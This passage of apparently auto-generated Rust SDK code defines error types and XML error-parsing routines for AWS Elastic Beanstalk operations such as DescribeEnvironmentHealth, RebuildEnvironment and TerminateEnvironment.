{ "TooManyBucketsException" => DescribeConfigurationSettingsError::TooManyBuckets(String::from(parsed_error.message)),_ => DescribeConfigurationSettingsError::Unknown(String::from(body)) } }, Err(_) => DescribeConfigurationSettingsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeConfigurationSettingsError { fn from(err: XmlParseError) -> DescribeConfigurationSettingsError { let XmlParseError(message) = err; DescribeConfigurationSettingsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeConfigurationSettingsError { fn from(err: CredentialsError) -> DescribeConfigurationSettingsError { DescribeConfigurationSettingsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeConfigurationSettingsError { fn from(err: HttpDispatchError) -> DescribeConfigurationSettingsError { DescribeConfigurationSettingsError::HttpDispatch(err) } } impl fmt::Display for DescribeConfigurationSettingsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeConfigurationSettingsError { fn description(&self) -> &str { match *self { DescribeConfigurationSettingsError::TooManyBuckets(ref cause) => cause, DescribeConfigurationSettingsError::Validation(ref cause) => cause, DescribeConfigurationSettingsError::Credentials(ref err) => err.description(), DescribeConfigurationSettingsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeConfigurationSettingsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentHealth #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentHealthError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String), ///<p>One or more input parameters is not valid. Please correct the input parameters and try the operation again.</p> InvalidRequest(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentHealthError { pub fn from_body(body: &str) -> DescribeEnvironmentHealthError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "ElasticBeanstalkServiceException" => DescribeEnvironmentHealthError::ElasticBeanstalkService(String::from(parsed_error.message)),"InvalidRequestException" => DescribeEnvironmentHealthError::InvalidRequest(String::from(parsed_error.message)),_ => DescribeEnvironmentHealthError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentHealthError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentHealthError { fn from(err: XmlParseError) -> DescribeEnvironmentHealthError { let XmlParseError(message) = err; DescribeEnvironmentHealthError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentHealthError { fn from(err: CredentialsError) -> DescribeEnvironmentHealthError { DescribeEnvironmentHealthError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentHealthError { fn from(err: HttpDispatchError) -> DescribeEnvironmentHealthError { DescribeEnvironmentHealthError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentHealthError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentHealthError { fn description(&self) -> &str { match *self { DescribeEnvironmentHealthError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentHealthError::InvalidRequest(ref cause) => cause, DescribeEnvironmentHealthError::Validation(ref cause) => cause, DescribeEnvironmentHealthError::Credentials(ref err) => err.description(), DescribeEnvironmentHealthError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentHealthError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentManagedActionHistory #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentManagedActionHistoryError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentManagedActionHistoryError { pub fn from_body(body: &str) -> DescribeEnvironmentManagedActionHistoryError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "ElasticBeanstalkServiceException" => DescribeEnvironmentManagedActionHistoryError::ElasticBeanstalkService(String::from(parsed_error.message)),_ => DescribeEnvironmentManagedActionHistoryError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentManagedActionHistoryError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: XmlParseError) -> DescribeEnvironmentManagedActionHistoryError { let XmlParseError(message) = err; DescribeEnvironmentManagedActionHistoryError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: CredentialsError) -> DescribeEnvironmentManagedActionHistoryError { DescribeEnvironmentManagedActionHistoryError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: HttpDispatchError) -> DescribeEnvironmentManagedActionHistoryError { DescribeEnvironmentManagedActionHistoryError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentManagedActionHistoryError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentManagedActionHistoryError { fn description(&self) -> &str { match *self { DescribeEnvironmentManagedActionHistoryError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentManagedActionHistoryError::Validation(ref cause) => cause, DescribeEnvironmentManagedActionHistoryError::Credentials(ref err) => err.description(), DescribeEnvironmentManagedActionHistoryError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentManagedActionHistoryError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentManagedActions #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentManagedActionsError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentManagedActionsError { pub fn from_body(body: &str) -> DescribeEnvironmentManagedActionsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "ElasticBeanstalkServiceException" => DescribeEnvironmentManagedActionsError::ElasticBeanstalkService(String::from(parsed_error.message)),_ => DescribeEnvironmentManagedActionsError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentManagedActionsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentManagedActionsError { fn from(err: XmlParseError) -> DescribeEnvironmentManagedActionsError { let XmlParseError(message) = err; DescribeEnvironmentManagedActionsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentManagedActionsError { fn from(err: CredentialsError) -> DescribeEnvironmentManagedActionsError { DescribeEnvironmentManagedActionsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentManagedActionsError { fn from(err: HttpDispatchError) -> DescribeEnvironmentManagedActionsError { DescribeEnvironmentManagedActionsError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentManagedActionsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentManagedActionsError { fn description(&self) -> &str { match *self { DescribeEnvironmentManagedActionsError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentManagedActionsError::Validation(ref cause) => cause, DescribeEnvironmentManagedActionsError::Credentials(ref err) => err.description(), DescribeEnvironmentManagedActionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentManagedActionsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentResources #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentResourcesError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentResourcesError { pub fn from_body(body: &str) -> DescribeEnvironmentResourcesError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => DescribeEnvironmentResourcesError::InsufficientPrivileges(String::from(parsed_error.message)),_ => DescribeEnvironmentResourcesError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentResourcesError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentResourcesError { fn from(err: XmlParseError) -> DescribeEnvironmentResourcesError { let XmlParseError(message) = err; DescribeEnvironmentResourcesError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentResourcesError { fn from(err: CredentialsError) -> DescribeEnvironmentResourcesError { DescribeEnvironmentResourcesError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentResourcesError { fn from(err: HttpDispatchError) -> DescribeEnvironmentResourcesError { DescribeEnvironmentResourcesError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentResourcesError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentResourcesError { fn description(&self) -> &str { match *self { DescribeEnvironmentResourcesError::InsufficientPrivileges(ref cause) => cause, DescribeEnvironmentResourcesError::Validation(ref cause) => cause, DescribeEnvironmentResourcesError::Credentials(ref err) => err.description(), DescribeEnvironmentResourcesError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentResourcesError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironments #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentsError { pub fn from_body(body: &str) -> DescribeEnvironmentsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ _ => DescribeEnvironmentsError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentsError { fn from(err: XmlParseError) -> DescribeEnvironmentsError { let XmlParseError(message) = err; DescribeEnvironmentsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentsError { fn from(err: CredentialsError) -> DescribeEnvironmentsError { DescribeEnvironmentsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentsError { fn from(err: HttpDispatchError) -> DescribeEnvironmentsError { DescribeEnvironmentsError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentsError { fn description(&self) -> &str { match *self { DescribeEnvironmentsError::Validation(ref cause) => cause, DescribeEnvironmentsError::Credentials(ref err) => err.description(), DescribeEnvironmentsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEvents #[derive(Debug, PartialEq)] pub enum DescribeEventsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEventsError { pub fn from_body(body: &str) -> DescribeEventsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DescribeEventsError::Unknown(String::from(body)) } }, Err(_) => DescribeEventsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEventsError { fn from(err: XmlParseError) -> DescribeEventsError { let XmlParseError(message) = err; DescribeEventsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEventsError { fn from(err: CredentialsError) -> DescribeEventsError { DescribeEventsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEventsError { fn from(err: HttpDispatchError) -> DescribeEventsError { DescribeEventsError::HttpDispatch(err) } } impl fmt::Display for DescribeEventsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEventsError { fn description(&self) -> &str { match *self { DescribeEventsError::Validation(ref cause) => cause, DescribeEventsError::Credentials(ref err) => err.description(), DescribeEventsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEventsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeInstancesHealth #[derive(Debug, PartialEq)] pub enum DescribeInstancesHealthError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String), ///<p>One or more input parameters is not valid. 
Please correct the input parameters and try the operation again.</p> InvalidRequest(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeInstancesHealthError { pub fn from_body(body: &str) -> DescribeInstancesHealthError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => DescribeInstancesHealthError::ElasticBeanstalkService(String::from(parsed_error.message)),"InvalidRequestException" => DescribeInstancesHealthError::InvalidRequest(String::from(parsed_error.message)),_ => DescribeInstancesHealthError::Unknown(String::from(body)) } }, Err(_) => DescribeInstancesHealthError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeInstancesHealthError { fn from(err: XmlParseError) -> DescribeInstancesHealthError { let XmlParseError(message) = err; DescribeInstancesHealthError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeInstancesHealthError { fn from(err: CredentialsError) -> DescribeInstancesHealthError { DescribeInstancesHealthError::Credentials(err) } } impl From<HttpDispatchError> for DescribeInstancesHealthError { fn from(err: HttpDispatchError) -> DescribeInstancesHealthError { DescribeInstancesHealthError::HttpDispatch(err) } } impl fmt::Display for DescribeInstancesHealthError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeInstancesHealthError { fn description(&self) -> &str { match *self { DescribeInstancesHealthError::ElasticBeanstalkService(ref cause) => cause, DescribeInstancesHealthError::InvalidRequest(ref cause) => cause, DescribeInstancesHealthError::Validation(ref cause) => cause, DescribeInstancesHealthError::Credentials(ref err) => err.description(), DescribeInstancesHealthError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeInstancesHealthError::Unknown(ref cause) => cause } } } /// Errors returned by ListAvailableSolutionStacks #[derive(Debug, PartialEq)] pub enum ListAvailableSolutionStacksError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ListAvailableSolutionStacksError { pub fn from_body(body: &str) -> ListAvailableSolutionStacksError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ _ => ListAvailableSolutionStacksError::Unknown(String::from(body)) } }, Err(_) => ListAvailableSolutionStacksError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ListAvailableSolutionStacksError { fn from(err: XmlParseError) -> ListAvailableSolutionStacksError { let XmlParseError(message) = err; ListAvailableSolutionStacksError::Unknown(message.to_string()) } } impl From<CredentialsError> for ListAvailableSolutionStacksError { fn from(err: CredentialsError) -> ListAvailableSolutionStacksError { ListAvailableSolutionStacksError::Credentials(err) } } impl From<HttpDispatchError> for ListAvailableSolutionStacksError { fn from(err: HttpDispatchError) -> ListAvailableSolutionStacksError { ListAvailableSolutionStacksError::HttpDispatch(err) } } impl fmt::Display for ListAvailableSolutionStacksError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ListAvailableSolutionStacksError { fn description(&self) -> &str { match *self { ListAvailableSolutionStacksError::Validation(ref cause) => cause, ListAvailableSolutionStacksError::Credentials(ref err) => err.description(), ListAvailableSolutionStacksError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ListAvailableSolutionStacksError::Unknown(ref cause) => cause } } } /// Errors returned by RebuildEnvironment #[derive(Debug, PartialEq)] pub enum RebuildEnvironmentError { ///<p>The specified account does not have sufficient privileges for one or more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RebuildEnvironmentError { pub fn from_body(body: &str) -> RebuildEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => RebuildEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),_ => RebuildEnvironmentError::Unknown(String::from(body)) } }, Err(_) => RebuildEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RebuildEnvironmentError { fn from(err: XmlParseError) -> RebuildEnvironmentError { let XmlParseError(message) = err; RebuildEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for RebuildEnvironmentError { fn from(err: CredentialsError) -> RebuildEnvironmentError { RebuildEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for RebuildEnvironmentError { fn from(err: HttpDispatchError) -> RebuildEnvironmentError { RebuildEnvironmentError::HttpDispatch(err) } } impl fmt::Display for RebuildEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RebuildEnvironmentError { fn description(&self) -> &str { match *self { RebuildEnvironmentError::InsufficientPrivileges(ref cause) => cause, RebuildEnvironmentError::Validation(ref cause) => cause, RebuildEnvironmentError::Credentials(ref err) => err.description(), RebuildEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RebuildEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by RequestEnvironmentInfo #[derive(Debug, PartialEq)] pub enum RequestEnvironmentInfoError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RequestEnvironmentInfoError { pub fn from_body(body: &str) -> RequestEnvironmentInfoError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ _ => RequestEnvironmentInfoError::Unknown(String::from(body)) } }, Err(_) => RequestEnvironmentInfoError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RequestEnvironmentInfoError { fn from(err: XmlParseError) -> RequestEnvironmentInfoError { let XmlParseError(message) = err; RequestEnvironmentInfoError::Unknown(message.to_string()) } } impl From<CredentialsError> for RequestEnvironmentInfoError { fn from(err: CredentialsError) -> RequestEnvironmentInfoError { RequestEnvironmentInfoError::Credentials(err) } } impl From<HttpDispatchError> for RequestEnvironmentInfoError { fn from(err: HttpDispatchError) -> RequestEnvironmentInfoError { RequestEnvironmentInfoError::HttpDispatch(err) } } impl fmt::Display for RequestEnvironmentInfoError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RequestEnvironmentInfoError { fn description(&self) -> &str { match *self { RequestEnvironmentInfoError::Validation(ref cause) => cause, RequestEnvironmentInfoError::Credentials(ref err) => err.description(), RequestEnvironmentInfoError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RequestEnvironmentInfoError::Unknown(ref cause) => cause } } } /// Errors returned by RestartAppServer #[derive(Debug, PartialEq)] pub enum RestartAppServerError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RestartAppServerError { pub fn from_body(body: &str) -> RestartAppServerError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => RestartAppServerError::Unknown(String::from(body)) } }, Err(_) => RestartAppServerError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RestartAppServerError { fn from(err: XmlParseError) -> RestartAppServerError { let XmlParseError(message) = err; RestartAppServerError::Unknown(message.to_string()) } } impl From<CredentialsError> for RestartAppServerError { fn from(err: CredentialsError) -> RestartAppServerError { RestartAppServerError::Credentials(err) } } impl From<HttpDispatchError> for RestartAppServerError { fn from(err: HttpDispatchError) -> RestartAppServerError { RestartAppServerError::HttpDispatch(err) } } impl fmt::Display for RestartAppServerError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RestartAppServerError { fn description(&self) -> &str { match *self { RestartAppServerError::Validation(ref cause) => cause, RestartAppServerError::Credentials(ref err) => err.description(), RestartAppServerError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RestartAppServerError::Unknown(ref cause) => cause } } } /// Errors returned by RetrieveEnvironmentInfo #[derive(Debug, PartialEq)] pub enum RetrieveEnvironmentInfoError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. 
Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RetrieveEnvironmentInfoError { pub fn from_body(body: &str) -> RetrieveEnvironmentInfoError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => RetrieveEnvironmentInfoError::Unknown(String::from(body)) } }, Err(_) => RetrieveEnvironmentInfoError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RetrieveEnvironmentInfoError { fn from(err: XmlParseError) -> RetrieveEnvironmentInfoError { let XmlParseError(message) = err; RetrieveEnvironmentInfoError::Unknown(message.to_string()) } } impl From<CredentialsError> for RetrieveEnvironmentInfoError { fn from(err: CredentialsError) -> RetrieveEnvironmentInfoError { RetrieveEnvironmentInfoError::Credentials(err) } } impl From<HttpDispatchError> for RetrieveEnvironmentInfoError { fn from(err: HttpDispatchError) -> RetrieveEnvironmentInfoError { RetrieveEnvironmentInfoError::HttpDispatch(err) } } impl fmt::Display for RetrieveEnvironmentInfoError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RetrieveEnvironmentInfoError { fn description(&self) -> &str { match *self { RetrieveEnvironmentInfoError::Validation(ref cause) => cause, RetrieveEnvironmentInfoError::Credentials(ref err) => err.description(), RetrieveEnvironmentInfoError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RetrieveEnvironmentInfoError::Unknown(ref cause) => cause } } } /// Errors returned by SwapEnvironmentCNAMEs #[derive(Debug, PartialEq)] pub enum SwapEnvironmentCNAMEsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl SwapEnvironmentCNAMEsError { pub fn from_body(body: &str) -> SwapEnvironmentCNAMEsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ _ => SwapEnvironmentCNAMEsError::Unknown(String::from(body)) } }, Err(_) => SwapEnvironmentCNAMEsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for SwapEnvironmentCNAMEsError { fn from(err: XmlParseError) -> SwapEnvironmentCNAMEsError { let XmlParseError(message) = err; SwapEnvironmentCNAMEsError::Unknown(message.to_string()) } } impl From<CredentialsError> for SwapEnvironmentCNAMEsError { fn from(err: CredentialsError) -> SwapEnvironmentCNAMEsError { SwapEnvironmentCNAMEsError::Credentials(err) } } impl From<HttpDispatchError> for SwapEnvironmentCNAMEsError { fn from(err: HttpDispatchError) -> SwapEnvironmentCNAMEsError { SwapEnvironmentCNAMEsError::HttpDispatch(err) } } impl fmt::Display for SwapEnvironmentCNAMEsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for SwapEnvironmentCNAMEsError { fn description(&self) -> &str { match *self { SwapEnvironmentCNAMEsError::Validation(ref cause) => cause, SwapEnvironmentCNAMEsError::Credentials(ref err) => err.description(), SwapEnvironmentCNAMEsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), SwapEnvironmentCNAMEsError::Unknown(ref cause) => cause } } } /// Errors returned by TerminateEnvironment #[derive(Debug, PartialEq)] pub enum TerminateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one or more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl TerminateEnvironmentError { pub fn from_body(body: &str) -> TerminateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => TerminateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),_ => TerminateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => TerminateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for TerminateEnvironmentError { fn from(err: XmlParseError) -> TerminateEnvironmentError { let XmlParseError(message) = err; TerminateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for TerminateEnvironmentError { fn from(err: CredentialsError) -> TerminateEnvironmentError { TerminateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for TerminateEnvironmentError { fn from(err: HttpDispatchError) -> TerminateEnvironmentError { TerminateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for TerminateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for TerminateEnvironmentError { fn description(&self) -> &str { match *self { TerminateEnvironmentError::InsufficientPrivileges(ref cause) => cause, TerminateEnvironmentError::Validation(ref cause) => cause, TerminateEnvironmentError::Credentials(ref err) => err.description(), TerminateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), TerminateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplication #[derive(Debug, PartialEq)] pub enum UpdateApplicationError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationError { pub fn from_body(body: &str) -> UpdateApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
